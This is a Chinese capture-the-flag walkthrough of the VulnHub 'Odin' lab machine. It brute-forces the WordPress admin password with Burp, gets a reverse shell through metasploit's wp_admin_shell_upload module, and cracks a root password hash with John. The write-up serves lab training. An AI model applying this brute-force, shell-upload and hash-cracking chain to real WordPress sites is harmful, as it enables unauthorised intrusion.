描述

难度:容易

奥丁以乔格海姆(Vegtam)的行者的名义冒险前往约特海姆(Jötunheim)附近的米米尔(Mimir)井。守卫井的米米尔(Mimir)允许他从井里喝水,他要求他牺牲左眼,这是他获取知识的意愿的象征

请添加/ etc / hosts-> ip vm + odin

例如:192.168.1.1 odin

推特:@ArmBjorn

在Virtualbox中工作。

获取root权限

由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns

编辑C:\Windows\System32\drivers\etc\hosts

底部添加 IP地址 odin

目录

一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

二、漏洞探测&利用

1. burp爆破

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

2 . metasploit反弹shell

四、提权

1.查询www下的配置文件wp-config.php

2.john解密

五、总结


一、信息收集

1.nmap端口扫描:

2.dirsearch目录扫描:

python3 dirsearch.py -u 192.168.155.132 -e php

找到后台目录,访问http://odin/wp-login.php

二、漏洞探测&利用

1. burp爆破

用户名admin密码不正确,burp爆破。

密码为:qwerty

登入后台管理。

2. getshell

1.过上传插件的方式将我们的一句话木马插入到根目录中

但是找不到文件的绝对路径。

2 . metasploit反弹shell

search wordpress shell  

搜索与wordpress 的payload

use exploit/unix/webapp/wp_admin_shell_uploadoptionsset password qwertyset username adminset rhost 192.168.155.132  #目标iprun

shellpython3 -c "import pty;pty.spawn('/bin/bash')"

四、提权

1.查询www下的配置文件wp-config.php

2.john解密

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/

将密文保存到pass.txt

john pass.txt  && john --show pass.txt

解得:root/jasmine

3.su

su root

五、总结

  • 知道cms的管理员的账号密码,但很难利用上传点时,msf> use exploit/unix/webapp/wp_admin_shell_upload
  • john解密

vulnhub--odin相关推荐

  1. VulnHub渗透测试实战靶场 - Odin:1

    VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...

  2. 三星手机如何分屏_刷机基础知识三星如何手机进入ODIN模式

    提示:点击上面的蓝字可以快速关注我们. 经常刷机的三星用户对ODIN这个词肯定都再熟悉不过了,不过仍然有许多新手用户对于如何进入ODIN模式还是一知半解,所以抽空整理了一下,如有写错的地方请大家纠正一 ...

  3. easyui表格编辑事件_Unity手游开发札记——从Odin插件聊基于元数据的编辑器实现

    Metadata is data that provides information about other data. 最近一个多月的时间在全力做新项目的Demo,由于程序暂时还只有我一个人,所以从 ...

  4. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  5. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  6. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  7. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  8. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  9. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  10. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

最新文章

  1. AsyncTask使用方式一
  2. linux源码包编译安装与rpm安装方法介绍
  3. iPhone/iOS图片相关(读取、保存、绘制、其它相关)
  4. LeetCode 454. 四数相加 II(哈希)
  5. django外调用url_Django url
  6. oracle11gR版本GI中新增,Oracle11g新特性MemberKillEscalation简介
  7. bootstrap学习5-栅格系统
  8. BOM对象有哪些,列举window对象?
  9. Xcode12.3 、12.4 运行 iOS15 :The code signature version is no longer supported
  10. BUUCTF-Misc-No.3
  11. 利用jackson-dataformat-xml包中的XmlMapper类将xml解析成实体类对象
  12. php服务器代维,服务器维护
  13. Nature子刊:使用纳米孔测序从微生物组中得到完整闭环的细菌基因组
  14. StringBuffer去掉最后一个字符
  15. 【前端】jQuery上传图片插件 : uploadifive
  16. 解决阿里云OSS使用URL无法访问图片
  17. 如何旋转图片方法#ps教程#ps学习#ps修图抠图
  18. 12.1.2、Doris__基本使用、doris的基本命令、建表概念、语句、建表语法、建表方式(引擎存储规则)、导入数据的方式、支持的数据类型、rollup索引
  19. 计算机中汉字的顺序有什么排列,汉字演变过程的时间排序是什么?
  20. 机器学习——关联规则

热门文章

  1. Linux上安装rz、sz命令
  2. HTML-W3school首页制作
  3. 【NOIP2012-Day2-T2-换教室】
  4. 神经网络是模型还是算法,神经网络模型的优势
  5. 微信开发工具调试窗口怎样查看netWork
  6. CoVaR计算手册-动态CoVaR模型-数据、代码、步骤
  7. DSP原理学习笔记--第十四章--DSP算法及其实现
  8. 姿态传感器的原理与应用文献笔记
  9. 学习强国---Android逆向及JS逆向
  10. HTML制作个简单的网页